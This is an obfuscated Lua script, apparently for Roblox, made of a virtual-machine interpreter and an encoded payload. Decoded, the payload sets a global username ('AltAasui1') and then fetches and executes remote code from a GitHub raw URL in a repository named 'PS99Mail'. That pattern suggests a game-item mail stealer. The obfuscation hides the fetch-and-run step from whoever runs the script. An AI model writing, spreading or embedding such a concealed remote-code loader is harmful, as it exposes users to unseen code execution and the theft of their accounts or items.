--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v84,v19);v19=nil;v97=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-1)))%((5 -(1640 -(1523 + 114)))^(((v33-((1 + 0) -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%((1328 -396) -((1922 -(68 + 997)) + 74))) ;else local v86=(1838 -(226 + 1044)) -(367 + 201) ;local v87;while true do if (v86==0) then v87=(929 -(214 + 713))^(v32-(1 + (0 -0))) ;return (((v31%(v87 + v87))>=v87) and ((118 -(32 + 85)) + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==((1 -0) + 0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (958 -((1637 -745) + (415 -(87 + 263)))) ;v34=2 -1 ;end end end local function v22()local v36=180 -(67 + 113) ;local v37;local v38;while true do if (v36==(1 + (0 -0))) then return (v38 * (628 -372)) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (7 -5) );v18=v18 + (954 -(802 + 150)) ;v36=1;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 + 0 ;return (v42 * (16778213 -(915 + 82))) + (v41 * (185570 -120034)) + (v40 * 256) + v39 ;end local function v24()local v43=0 -(1080 -(1020 + 60)) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1190 -(1069 + 118))) then if (v48==((1423 -(630 + 793)) -0)) then if (v47==(0 -0)) then return v49 * (0 + (0 -0)) ;else local v99=0 -0 ;while true do if ((0 + 0)==v99) then v48=792 -(368 + 423) ;v46=0;break;end end end elseif (v48==2047) then return ((v47==(0 -0)) and (v49 * ((19 -((47 -37) + 8))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1465 -(416 + 11 + 15)) ) * (v46 + (v47/(2^(165 -113)))) ;end if (v43==(1 + 0)) then v46=1;v47=(v20(v45,(2 -1) -0 ,458 -(145 + 293) ) * ((432 -(3 + 41 + 386))^(1518 -(998 + 173 + 315)))) + v44 ;v43=1 + (886 -(261 + 624)) ;end if ((0 + 0)==v43) then v44=v23();v45=v23();v43=773 -(201 + (2318 -(760 + 987))) ;end if (((3053 -(1789 + 124)) -(116 + 1022))==v43) then v48=v20(v45,87 -66 ,(785 -(745 + 21)) + 12 );v49=((v20(v45,(206 -90) -84 )==(1 + 0)) and  -1) or (3 -2) ;v43=862 -(814 + (123 -78)) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=v3(v16,v18,(v18 + v50) -(3 -2) );v18=v18 + v50 ;local v52={};for v67=1, #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((4 -2)==v53) then v58=nil;v59=nil;v53=1 + 2 ;end if (v53==0) then v54=0;v55=nil;v53=1 -0 ;end if ((1470 -(899 + 568))==v53) then v60=nil;while true do local v91=0;local v92;while true do if (v91~=(0 + 0)) then else v92=0;while true do if (v92==0) then local v107=0 -0 ;while true do if ((603 -(268 + 335))~=v107) then else if (v54==(293 -(60 + 230))) then local v162=572 -(426 + 146) ;local v163;while true do if (v162~=(0 + 0)) then else v163=0;while true do if (v163~=0) then else local v184=1456 -(282 + 1174) ;while true do if (v184==(811 -(569 + 242))) then for v186=1,v23() do v56[v186-1 ]=v28();end return v58;end end end end break;end end end if (v54==1) then local v164=0;while true do if (v164~=1) then else v60={};v54=2;break;end if (v164==0) then local v183=0 -0 ;while true do if (v183~=(1 + 0)) then else v164=1025 -(706 + 318) ;break;end if (v183==0) then v58={v55,v56,nil,v57};v59=v23();v183=2 -1 ;end end end end end v107=1 + 0 ;end if (v107==(701 -(271 + 429))) then v92=1;break;end end end if (v92~=1) then else if ((2 + 0)~=v54) then else local v132=1500 -(1408 + 92) ;while true do if (v132~=1) then else for v172=1,v23() do local v173=0;local v174;local v175;local v176;while true do if ((1086 -(461 + 625))~=v173) then else v174=0;v175=nil;v173=1;end if (v173==1) then v176=nil;while true do if (v174==(1289 -(993 + 295))) then while true do if ((0 + 0)~=v175) then else v176=v21();if (v20(v176,1,1)==(1171 -(418 + 753))) then local v190=0;local v191;local v192;local v193;local v194;while true do if (2==v190) then while true do if (v191==(2 + 1)) then if (v20(v193,1 + 2 ,1 + 2 )==(1 + 0)) then v194[533 -(406 + 123) ]=v60[v194[4]];end v55[v172]=v194;break;end if (v191~=(1769 -(1749 + 20))) then else local v196=0;local v197;while true do if (v196==(0 + 0)) then v197=1322 -(1249 + 73) ;while true do if (v197==(1 + 0)) then v191=1146 -(466 + 679) ;break;end if (v197==(0 -0)) then local v207=0 -0 ;while true do if (v207~=1) then else v197=1;break;end if ((1900 -(106 + 1794))==v207) then v192=v20(v176,1 + 1 ,3);v193=v20(v176,4,6);v207=1 + 0 ;end end end end break;end end end if (v191==1) then local v198=0;local v199;while true do if (v198~=(0 -0)) then else v199=0;while true do if (v199==(2 -1)) then v191=2;break;end if (v199==0) then local v208=0;while true do if (v208==(115 -(4 + 110))) then v199=1;break;end if (0~=v208) then else v194={v22(),v22(),nil,nil};if (v192==(103 -(17 + 86))) then local v209=0;local v210;local v211;local v212;while true do if (v209==(0 + 0)) then v210=0 -0 ;v211=nil;v209=1;end if (v209==(2 -1)) then v212=nil;while true do if (v210==(166 -(122 + 44))) then local v215=0 -0 ;while true do if (v215~=(3 -2)) then else v210=1;break;end if (v215==0) then v211=0;v212=nil;v215=1 + 0 ;end end end if (v210==1) then while true do if (v211~=(0 + 0)) then else v212=0;while true do if (v212==0) then v194[5 -2 ]=v22();v194[4]=v22();break;end end break;end end break;end end break;end end elseif (v192==1) then v194[3]=v23();elseif (v192==2) then v194[68 -(30 + 35) ]=v23() -(2^(11 + 5)) ;elseif (v192==(1260 -(1043 + 214))) then local v216=0 -0 ;local v217;while true do if ((1212 -(323 + 889))~=v216) then else v217=0 -0 ;while true do if ((580 -(361 + 219))~=v217) then else v194[323 -(53 + 267) ]=v23() -((1 + 1)^16) ;v194[4]=v22();break;end end break;end end end v208=1;end end end end break;end end end if ((415 -(15 + 398))~=v191) then else local v200=0;while true do if (1==v200) then v191=985 -(18 + 964) ;break;end if (v200==(0 -0)) then if (v20(v193,1 + 0 ,1 + 0 )==(851 -(20 + 830))) then v194[2]=v60[v194[2]];end if (v20(v193,2 + 0 ,2)~=1) then else v194[129 -(116 + 10) ]=v60[v194[1 + 2 ]];end v200=739 -(542 + 196) ;end end end end break;end if (v190~=0) then else v191=0;v192=nil;v190=1;end if ((1 -0)==v190) then v193=nil;v194=nil;v190=2;end end end break;end end break;end if (0==v174) then local v185=0;while true do if (v185==1) then v174=1;break;end if (v185~=(0 + 0)) then else v175=0;v176=nil;v185=1 + 0 ;end end end end break;end end end v54=2 + 1 ;break;end if (v132~=(0 -0)) then else for v177=2 -1 ,v59 do local v178=1551 -(1126 + 425) ;local v179;local v180;local v181;local v182;while true do if (v178~=(405 -(118 + 287))) then else v179=0 -0 ;v180=nil;v178=1;end if (v178==(1123 -(118 + 1003))) then while true do if (v179~=0) then else v180=0 -0 ;v181=nil;v179=378 -(142 + 235) ;end if (v179~=(4 -3)) then else v182=nil;while true do if (v180~=1) then else if (v181==1) then v182=v21()~=0 ;elseif (v181==(1 + 1)) then v182=v24();elseif (v181==3) then v182=v25();end v60[v177]=v182;break;end if (v180~=0) then else local v189=0;while true do if (v189==0) then v181=v21();v182=nil;v189=978 -(553 + 424) ;end if (v189==(1 -0)) then v180=1 + 0 ;break;end end end end break;end end break;end if (v178==1) then v181=nil;v182=nil;v178=2 + 0 ;end end end v58[2 + 1 ]=v21();v132=1 + 0 ;end end end if (v54==(0 + 0)) then local v133=0 -0 ;while true do if (v133==(0 -0)) then v55={};v56={};v133=2 -1 ;end if (v133==(1 + 0)) then v57={};v54=1;break;end end end break;end end break;end end end break;end if (v53==(4 -3)) then v56=nil;v57=nil;v53=2;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then local v100=0;local v101;local v102;while true do if (v100==0) then v101=v81[2];v102=v79[v81[3]];v100=1;end if (1==v100) then v79[v101 + 1 ]=v102;v79[v101]=v102[v81[4]];break;end end elseif (v82==1) then v79[v81[2]]=v81[3];else for v130=v81[2],v81[3] do v79[v130]=nil;end end elseif (v82<=3) then v63[v81[3]]=v79[v81[2]];elseif (v82==4) then local v110=0;local v111;local v112;local v113;local v114;local v115;while true do if (v110==6) then v79[v115]=v79[v115](v13(v79,v115 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v110=7;end if (v110==3) then v79[v115 + 1 ]=v114;v79[v115]=v114[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v110=4;end if (v110==4) then v73=v73 + 1 ;v81=v69[v73];v115=v81[2];v112,v113=v72(v79[v115](v13(v79,v115 + 1 ,v81[3])));v74=(v113 + v115) -1 ;v110=5;end if (v110==1) then v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v81=v69[v73];v110=2;end if (v110==5) then v111=0;for v156=v115,v74 do v111=v111 + 1 ;v79[v156]=v112[v111];end v73=v73 + 1 ;v81=v69[v73];v115=v81[2];v110=6;end if (v110==2) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v81=v69[v73];v115=v81[2];v114=v79[v81[3]];v110=3;end if (v110==7) then v81=v69[v73];v73=v81[3];break;end if (v110==0) then v111=nil;v112,v113=nil;v114=nil;v115=nil;v63[v81[3]]=v79[v81[2]];v110=1;end end else v79[v81[2]]();end elseif (v82<=8) then if (v82<=6) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82>7) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==1) then v74=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==2) then for v159=v120,v74 do v123=v123 + 1 ;v79[v159]=v121[v123];end break;end if (v119==0) then v120=v81[2];v121,v122=v72(v79[v120](v13(v79,v120 + 1 ,v81[3])));v119=1;end end end elseif (v82<=9) then local v105=v81[2];v79[v105]=v79[v105](v13(v79,v105 + 1 ,v74));elseif (v82>10) then do return;end else v73=v81[3];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503093O00416C74416173756931030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012013O00014O0002000100013O0026083O00020001000100040A3O00020001001201000100013O002608000100050001000100040A3O00050001001201000200033O001204000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O0014000100040A3O0005000100040A3O0014000100040A3O000200012O000B3O00017O00",v9(),...);
